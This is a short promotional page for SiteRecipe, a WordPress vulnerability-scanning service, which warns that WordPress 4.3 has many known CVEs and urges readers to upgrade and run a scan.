Plain English · Fix recommendations · Instant PDF & HTML download
Scan your site in 30 seconds. Used by 500+ web agencies.
WordPress 4.3 presents a serious security risk with 144 known vulnerabilities waiting to be exploited. The 9 critical CVEs we've detailed can lead to unauthorized code execution, data breaches, and complete website compromise. Delaying this upgrade isn't just a technical issue—it's a business risk that could result in lost customers, legal liability, and expensive recovery costs.
Don't let your website become another victim of preventable attacks. SiteRecipe.com provides comprehensive WordPress security scanning and automated vulnerability assessment tools that identify which versions you're running and flag all known CVEs affecting your site. Our platform makes it easy to track your WordPress health, prioritize critical updates, and maintain a secure online presence. Start your free security scan today and protect your website before it's too late.
Web agencies use SiteRecipe to produce branded PDF security reports in 30 seconds.